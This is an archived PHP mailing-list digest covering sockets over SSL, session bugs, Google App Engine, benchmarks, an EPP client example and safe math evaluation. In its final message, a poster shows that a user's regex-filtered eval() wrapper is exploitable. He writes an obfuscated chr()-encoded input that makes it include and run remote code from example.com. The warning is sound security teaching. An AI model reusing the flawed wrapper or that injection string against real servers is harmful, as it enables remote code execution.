php-general Digest 11 Apr 2008 09:26:57 -0000 Issue 5398
Topics (messages 272848 through 272867):
Re: Requested PHP apps / sites
272848 by: Wolf
272854 by: Shawn McKenzie
272855 by: Shawn McKenzie
Socket create with ssl server
272849 by: Alan Willsher
272853 by: Nirmalya Lahiri
272859 by: Greg Bowser
272863 by: Wolf
$_SESSION problem
272850 by: tedd
272851 by: Nathan Nobbe
272852 by: Nathan Nobbe
272860 by: Eric Wood
272861 by: paragasu
272862 by: mike
Google App Engine needs PHP support
272856 by: Manuel Lemos
272857 by: Shawn McKenzie
Re: Vote for PHP support in Google App Engine
272858 by: mike
Re: Common PHP functions benchmarks
272864 by: Jason Knight
272866 by: Larry Garfield
Re: Connecting to an epp server
272865 by: Paul van Brouwershaven
Re: Evaluating math without eval()
272867 by: Robin Vickery
Administrivia:
To subscribe to the digest, e-mail:
[EMAIL PROTECTED]
To unsubscribe from the digest, e-mail:
[EMAIL PROTECTED]
To post to the list, e-mail:
[EMAIL PROTECTED]
----------------------------------------------------------------------
--- Begin Message ---
---- Dan <[EMAIL PROTECTED]> wrote:
> That would be a pretty interesting app to make. If you actually followed
> Osborn's Brainstorming technique then you should be able to develop a pretty
> cool real-time think tank where developers work in a sort of chat room but
> with a place to post common code, with markup, share a virtual whiteboard,
> etc.
>
> Could be cool.
>
> - Dan
>
>
> > Oh, what you're looking for is a think tank. I'd been trying to
> > find people in my area to get together and do the same thing. No such
> > luck around here, but you may have luck in your local area. Working
> > offline with people, when you can bounce ideas off of one-another
> > while doing something else, gets the creative juices flowing more,
> > because you're not focused on saying, "okay, we need to come up with
> > an idea."
> >
> > --
> > </Daniel P. Brown>
> > Ask me about:
> > Dedicated servers starting @ $59.99/mo., VPS starting @ $19.99/mo.,
> > and shared hosting starting @ $2.50/mo.
> > Unmanaged, managed, and fully-managed!
>
Google Document Sharing
Allows multiple people to edit, review, modify, markup...
:)
Wolf
--- End Message ---
--- Begin Message ---
Dan wrote:
That would be a pretty interesting app to make. If you actually
followed Osborn's Brainstorming technique then you should be able to
develop a pretty cool real-time think tank where developers work in a
sort of chat room but with a place to post common code, with markup,
share a virtual whiteboard, etc.
Could be cool.
- Dan
Oh, what you're looking for is a think tank. I'd been trying to
find people in my area to get together and do the same thing. No such
luck around here, but you may have luck in your local area. Working
offline with people, when you can bounce ideas off of one-another
while doing something else, gets the creative juices flowing more,
because you're not focused on saying, "okay, we need to come up with
an idea."
--
</Daniel P. Brown>
Ask me about:
Dedicated servers starting @ $59.99/mo., VPS starting @ $19.99/mo.,
and shared hosting starting @ $2.50/mo.
Unmanaged, managed, and fully-managed!
Well, I have my idea to do the site to help/collect the brainstorming.
But that probably won't be my coding project, as this seems to me to be
just a good forum with polls, for which several good ones already exist.
Maybe I use those to build the site and then the ideas come forth?
-Shawn
--- End Message ---
--- Begin Message ---
Shawn McKenzie wrote:
Dan wrote:
That would be a pretty interesting app to make. If you actually
followed Osborn's Brainstorming technique then you should be able to
develop a pretty cool real-time think tank where developers work in a
sort of chat room but with a place to post common code, with markup,
share a virtual whiteboard, etc.
Could be cool.
- Dan
Oh, what you're looking for is a think tank. I'd been trying to
find people in my area to get together and do the same thing. No such
luck around here, but you may have luck in your local area. Working
offline with people, when you can bounce ideas off of one-another
while doing something else, gets the creative juices flowing more,
because you're not focused on saying, "okay, we need to come up with
an idea."
--
</Daniel P. Brown>
Ask me about:
Dedicated servers starting @ $59.99/mo., VPS starting @ $19.99/mo.,
and shared hosting starting @ $2.50/mo.
Unmanaged, managed, and fully-managed!
Well, I have my idea to do the site to help/collect the brainstorming.
But that probably won't be my coding project, as this seems to me to be
just a good forum with polls, for which several good ones already exist.
Maybe I use those to build the site and then the ideas come forth?
-Shawn
Sorry, I meant:
<?php
echo "
Maybe
I
use
those
to
build
the
site
and
then
the
ideas
come
forth?
\n
C'mon Friday!!!";
?>
--- End Message ---
--- Begin Message ---
Hi how do you use socket_create with an ssl server
ie I would do something like
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_bind($sock, $sourceip);
socket_connect($sock, 'server.com', 2043);
but if I do
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_bind($sock, $sourceip);
socket_connect($sock, 'ssl://server.com', 2043);
I get Warning: socket_connect(): Host lookup failed [-10001]: Unknown host
Where do I need to add the ssl://
--- End Message ---
--- Begin Message ---
--- Alan Willsher <[EMAIL PROTECTED]> wrote:
> Hi how do you use socket_create with an ssl server
>
> ie I would do something like
>
> $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
> socket_bind($sock, $sourceip);
> socket_connect($sock, 'server.com', 2043);
>
> but if I do
>
> $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
> socket_bind($sock, $sourceip);
> socket_connect($sock, 'ssl://server.com', 2043);
>
> I get Warning: socket_connect(): Host lookup failed [-10001]:
> Unknown host
>
> Where do I need to add the ssl://
>
Hi,
before test your sample program, please check the name
"ssl://server.com" from any DNS server that, the name is really
present in internet or not. Your problem is basically name resolution
error from DNS server. To check the name, apply "host" command from
unix/linux terminal.
Another point is...as I know the url of ssl encripted page starts
with "https://"; not with "ssl://"...!!!
---
Nirmalya Lahiri
[+91-9433113536]
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
--- End Message ---
--- Begin Message ---
The sockets extension is a much "lower" level interface to sockets
than the fsockets/stream_ functions in PHP.
Unlike with the aforementioned, with the sockets extension, you can't
just expect to magically get an ssl connection by using "ssl://".
Your problem is that the sockets extension has no idea what you mean
by "ssl://"; and since "ssl://foo" is clearly not a valid domain name,
resolution fails.
Short Answer: use fsockets if you need SSL ;)
--- End Message ---
--- Begin Message ---
Top postinng due to sendng from my cell phone...
I'd suggest you lookl at doing the ssl to the server ip address not the host
name, and from reading your other note, it looks like ssl: isnlt needed,
merely the name/ip of the server.
HTH,
Wolf
-----Original Message-----
From: Alan Willsher <[EMAIL PROTECTED]>
Sent: Thursday, April 10, 2008 5:20 PM
To: [EMAIL PROTECTED]
Subject: [PHP] Socket create with ssl server
Hi how do you use socket_create with an ssl server
ie I would do something like
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_bind($sock, $sourceip);
socket_connect($sock, 'server.com', 2043);
but if I do
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_bind($sock, $sourceip);
socket_connect($sock, 'ssl://server.com', 2043);
I get Warning: socket_connect(): Host lookup failed [-10001]: Unknown host
Where do I need to add the ssl://
--- End Message ---
--- Begin Message ---
Hi gang:
I'm stumped and in need of some expert explanation.
I have prepared two demos (showing code) for your enjoyment:
[1] http://www.webbytedd.com/x/index.php
[2] http://sperling.com/x/index.php
Both of these demos have the exact same code; and are on the same
server; with exactly the same php-info -- so, why do they behave
differently re sessions?
Note that [1] will retain the session values throughout the entire
session, while [2] does not and loses session values.
Why?
Cheers,
tedd
--
-------
http://sperling.com http://ancientstones.com http://earthstones.com
--- End Message ---
--- Begin Message ---
On Thu, Apr 10, 2008 at 4:29 PM, tedd <[EMAIL PROTECTED]> wrote:
> Hi gang:
>
> I'm stumped and in need of some expert explanation.
>
> I have prepared two demos (showing code) for your enjoyment:
>
> [1] http://www.webbytedd.com/x/index.php
> [2] http://sperling.com/x/index.php
>
> Both of these demos have the exact same code; and are on the same server;
> with exactly the same php-info -- so, why do they behave differently re
> sessions?
>
> Note that [1] will retain the session values throughout the entire
> session, while [2] does not and loses session values.
as a sanity check have you dumped out the contents of the session after
writing to it on [2] ?
eg.
<?php
// ....
$_SESSION['q6'] = ( isset($_SESSION['q6']) ? $_SESSION['q6'] : 0);
$_SESSION['q7'] = ( isset($_SESSION['q7']) ? $_SESSION['q7'] : 0);
$_SESSION['q8'] = ( isset($_SESSION['q8']) ? $_SESSION['q8'] : 0);
$_SESSION['q9'] = ( isset($_SESSION['q9']) ? $_SESSION['q9'] : 0);
var_dump($_SESSION);
?>
also, doubtful or id assume youd mention it; but do you have .htaccess on
either of the sites? you might just dump out the session component of the
php config on each site to ensure theyre the same.
-nathan
--- End Message ---
--- Begin Message ---
On Thu, Apr 10, 2008 at 5:05 PM, Nathan Nobbe <[EMAIL PROTECTED]>
wrote:
> On Thu, Apr 10, 2008 at 4:29 PM, tedd <[EMAIL PROTECTED]> wrote:
> you might just dump out the session component of the php config on each
> site to ensure theyre the same.
>
on that last note, this could be useful,
<?php
die(var_dump(ini_get_all('session')));
?>
-nathan
--- End Message ---
--- Begin Message ---
tedd wrote:
[1] http://www.webbytedd.com/x/index.php
[2] http://sperling.com/x/index.php
Both of these demos have the exact same code; and are on the same
server; with exactly the same php-info -- so, why do they behave
differently re sessions?
Strange. I've run into issues whenever I use variable names which are
the same as session variables. It's as if they step on each others
toes. I try to use uniq var names. I've also recently run into
customized 401 pages (which you may not see happen, check the logs)
start up and the session data gets overwrite due to a lack of session
file locking.
-eric
--- End Message ---
--- Begin Message ---
it looks fine to me. but i want to share one bad experience with sessions.
the code i wrote work just fine on my testing server (please note, the
phpinfo is same with
my production server).
after days of figuring out why the session do not work. finally, i found the
solutions.
the solutions is to add a
@session_write_close() on the end of the execution code. on my case it
happen
every time i forward the page. so adding the @session_write_close before the
header('location: xxxx') fix the problem.
this might be a possible explanation..
--- End Message ---
--- Begin Message ---
I believe you can accomplish the same thing by just putting this in:
register_shutdown_function('session_write_close');
On 4/10/08, paragasu <[EMAIL PROTECTED]> wrote:
> it looks fine to me. but i want to share one bad experience with sessions.
> the code i wrote work just fine on my testing server (please note, the
> phpinfo is same with
> my production server).
>
> after days of figuring out why the session do not work. finally, i found the
> solutions.
> the solutions is to add a
>
> @session_write_close() on the end of the execution code. on my case it
> happen
> every time i forward the page. so adding the @session_write_close before the
> header('location: xxxx') fix the problem.
>
> this might be a possible explanation..
>
--- End Message ---
--- Begin Message ---
Hello,
Google App Engine was launched but it does not support PHP. This article
presents some ideas that can help Google adding PHP support sooner
rather than later.
http://www.phpclasses.org/blog/post/77-Google-App-Engine-needs-PHP-support.html
--
Regards,
Manuel Lemos
PHP professionals looking for PHP jobs
http://www.phpclasses.org/professionals/
PHP Classes - Free ready to use OOP components written in PHP
http://www.phpclasses.org/
--- End Message ---
--- Begin Message ---
Manuel Lemos wrote:
Hello,
Google App Engine was launched but it does not support PHP. This article
presents some ideas that can help Google adding PHP support sooner
rather than later.
http://www.phpclasses.org/blog/post/77-Google-App-Engine-needs-PHP-support.html
-1 Redundant :-)
--- End Message ---
--- Begin Message ---
A co-worker and I were talking about this again today, and I stumbled
upon this crazy idea.
What if this is Google providing people it's own preferred hosting and
backend solutions in the hopes that people make some cool apps they
can easily just buy and not even have to convert to land in their own
environment? I mean, it has their integrated auth, their datastore and
their filesystem.
I'm not quite sure their interest is to support everyone's favorite
language (I could be wrong) but it could be a covert way to get people
to code apps that have very little overhead to bring in-house, since
technically it already is :)
Explained a little bit better here:
http://michaelshadle.com/2008/04/10/google-appengine-1-develop-site-2-get-bought-by-google-3-profit/
--- End Message ---
--- Begin Message ---
Does nobody have any other input?
On Tue, Apr 8, 2008 at 12:52 PM, Jason Knight <[EMAIL PROTECTED]> wrote:
> I've been running some benchmarks on popular PHP functions. I would like
> to get some input on them from the community. So far I have run tests on
> Arrays and PHP5's SPL ArrayObject, as well as loops and some networking
> functions.
>
>
> Here is a link to the code used for the benchmarks.
> http://www.synthable.com/benchmarks/
>
> Thanks,
> Jason <http://www.synthable.com/>
>
--- End Message ---
--- Begin Message ---
I did some similar micro-benchmarking a while back, too:
http://www.garfieldtech.com/blog/magic-benchmarks
On Tuesday 08 April 2008, Jason Knight wrote:
> I've been running some benchmarks on popular PHP functions. I would like
> to get some input on them from the community. So far I have run tests on
> Arrays and PHP5's SPL ArrayObject, as well as loops and some networking
> functions.
>
>
> Here is a link to the code used for the benchmarks.
> http://www.synthable.com/benchmarks/
>
> Thanks,
> Jason <http://www.synthable.com/>
--
Larry Garfield AIM: LOLG42
[EMAIL PROTECTED] ICQ: 6817012
"If nature has made any one thing less susceptible than all others of
exclusive property, it is the action of the thinking power called an idea,
which an individual may exclusively possess as long as he keeps it to
himself; but the moment it is divulged, it forces itself into the possession
of every one, and the receiver cannot dispossess himself of it." -- Thomas
Jefferson
--- End Message ---
--- Begin Message ---
epp-example from dns.be:
<?php
//============================================
function mod ($a, $b)
{
return $a % $b;
}
//============================================
class EppSocket {
var $fp = null;
function EppSocket()
{
}
function connect($addr, $port, $timeout)
{
$this->fp = fsockopen ($addr, $port , $errno, $errstr, $timeout);
return 0;
}
function readInteger()
{
$buf = fread($this->fp, 4);
if (strlen($buf) < 4)
{
echo "failed to read 4 bytes \n";
exit;
}
$b0 = ord($buf[0]);
$b1 = ord($buf[1]);
$b2 = ord($buf[2]);
$b3 = ord($buf[3]);
$value = $b3 + 256* ($b2 + 256* ($b1 + 256* $b0));
echo "integer read from socket: $value \n";
return $value;
}
function readString ($bytes)
{
echo "waiting for $bytes bytes\n";
$left = $bytes;
$data = '';
while ( !feof($this->fp) ) {
$chunk = fread($this->fp, $left);
$data .= $chunk;
$left = $left - strlen($chunk);
if ($left == 0)
break;
}
return $data;
}
function readEppString()
{
$len = $this->readInteger();
$len = $len - 4;
return $this->readString ($len);
}
function close()
{
fclose ($this->fp);
}
// this will fail for values bigger than 0x7FFFFFFF (since PHP sucks at math)
// on Windows: PHP thinks that 0xFFFFFFFE modulo 256 = 256 !?!
// on Linux : PHP thinks that 0xFFFFFFFE modulo 256 = -2 !?!
function writeInteger ($value)
{
$b3 = mod ($value, 256);
$value = ($value - $b3)/256;
$b2 = mod ($value, 256);
$value = ($value - $b2)/256;
$b1 = mod ($value, 256);
$value = ($value - $b1)/256;
$b0 = mod ($value, 256);
echo "$value split up in bytes : $b0 $b1 $b2 $b3 \n";
fwrite ($this->fp, chr($b0), 1);
fwrite ($this->fp, chr($b1), 1);
fwrite ($this->fp, chr($b2), 1);
fwrite ($this->fp, chr($b3), 1);
}
function writeEppString ($message)
{
$len = strlen ($message);
echo "len: $len \n";
$len = $len + 4;
echo "total message length: $len bytes \n";
$this->writeInteger ($len);
echo "writing message itself \n";
$written = fwrite ($this->fp, $message);
echo "bytes written: $written \n";
}
}
//=====================================================
{
$socket = new EppSocket();
$server = "ssl://epp.example.org"; // replace with hostname of your
registry's epp server
$port = 33123;
$timeout = 30;
$ok = $socket->connect ($server, $port, $timeout);
if ( $ok != 0)
{
echo "failed to connect to $server, check server name !!";
exit;
}
echo "ok, connected to $server at port $port\n";
$greeting = $socket->readEppString();
echo "=====================\n";
echo "$greeting ";
echo "=====================\n";
$hello = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><epp
xmlns=\"urn:ietf:params:xml:ns:epp-1.0\"> <hello/></epp>";
$socket->writeEppString ($hello);
echo "waiting for reply \n";
$response = $socket->readEppString();
echo "=====================\n";
echo "$response ";
echo "=====================\n";
$garbage = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><epp
xmlns=\"urn:ietf:params:xml:ns:epp-1.0\"> <garbage/></epp>";
$socket->writeEppString ($garbage);
$response = $socket->readEppString();
echo "=====================\n";
echo "$response ";
echo "=====================\n";
$socket->close();
}
?>
Alan Willsher schreef:
What is 4 bytes ?
On Thu, Apr 10, 2008 at 3:35 PM, Paul van Brouwershaven <
[EMAIL PROTECTED]> wrote:
don't forget to send the 4 bytes!
Alan Willsher schreef:
Hi im trying to connect to Nominets EPP server
Details can be found here
http://www.nominet.org.uk/registrars/systems/epp/
Im trying to send a login request the example can be found here
http://www.nominet.org.uk/registrars/systems/epp/login/
My script seems to connect ok, but im recieving no response when I try
to
send the login xml details.
<?
$fp = @fsockopen('ssl://testbed-epp.nominet.org.uk', 700, $errno,
$errstr,
100);
echo "(".$errno." ".$errstr.")";
if(!$fp) {
echo "Not Connected!";
}
else {
echo "Connected!\r\n";
$xml = '<?xml version="1.0" encoding="UTF-8"?>
<epp xmlns="urn:ietf:params:xml:ns:epp-1.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";
xsi:schemaLocation="urn:ietf:params:xml:ns:epp-1.0 epp-1.0.xsd">
<command>
<login>
<clID>EXAMPLE-TAG</clID>
<pw>foo-BAR2</pw>
<options>
<version>1.0</version>
<lang>en</lang>
</options>
<svcs>
<objURI>http://www.nominet.org.uk/epp/xml/nom-account-1.0
</objURI>
<objURI>http://www.nominet.org.uk/epp/xml/nom-domain-1.0
</objURI>
<objURI>http://www.nominet.org.uk/epp/xml/nom-contact-1.0
</objURI>
<objURI>http://www.nominet.org.uk/epp/xml/nom-ns-1.0</objURI>
</svcs>
</login>
<clTRID>ABC-12345</clTRID>
</command>
</epp>';
fputs($fp, $xml, strlen($xml));
while (!feof($fp)) {
$response .= fgets($fp, 128);
}
echo $response;
fclose($fp);
}
?>
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--- End Message ---
--- Begin Message ---
On 10/04/2008, Jason Norwood-Young <[EMAIL PROTECTED]> wrote:
> On Thu, 2008-04-10 at 13:15 +0100, Richard Heyes wrote:
>
> > > First post to this list! I'm trying to figure out how to evaluate a
> > > string with a mathematical expression and get a result, but without
> > > using eval() as I'm accepting user input into the string. I don't just
> > > want addition, subtraction, multiplication and division - I'd like to
> > > take advantage of other functions like ceil, floor etc.
>
>
> In reply to my own question, I came up with the following function based
> on a comment on php.net
> (http://www.php.net/manual/en/function.eval.php#71045). I had a look at
> the array returned by get_defined_functions() and the maths functions
> seem mostly to be grouped (with the exception of the random number
> stuff). It works on my installation but there's nothing in the
> documentation about get_defined_functions() returning in a particular
> order - it would be safer to list each math function but I'm lazy.
>
> protected function safe_eval($s) {
> $funcs=get_defined_functions();
> $funcs=$funcs["internal"];
> $funcs=array_slice($funcs,array_search("abs",
> $funcs),array_search("rad2deg",$funcs)-array_search("abs",$funcs));
> $sfuncs="(".implode(")(",$funcs).")";
> $s=preg_replace('`([^+\-*=/\(\)\d\^<>&|\.'.$sfuncs.']*)`','',$s);
> if (empty($s)) {
> return 0;
> } else {
> try {
> eval("\$s=$s;");
> return $s;
> } catch(Exception $e) {
> return 0;
>
> }
> }
> }
That kind of thing is pretty dangerous.
In this case the regex is broken - you're putting all the function
names within the character class. That means that any character
contained within one of the allowed function names may be used in the
eval. So you can use any function that consists entirely of the
characters
abcdefghilmnopqrstuwxy01234567890_+-*=/^<>&|
which means you can include() malicious content like this:
safe_eval('include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(101).chr(120).chr(97).chr(109).chr(112).chr(108).chr(101).chr(46).chr(99).chr(111).chr(109).chr(47).chr(112).chr(97).chr(121).chr(108).chr(111).chr(97).chr(100).chr(46).chr(112).chr(104).chr(112))');
which evaluates to include('http://example.com/payload.php')
-robin
--- End Message ---
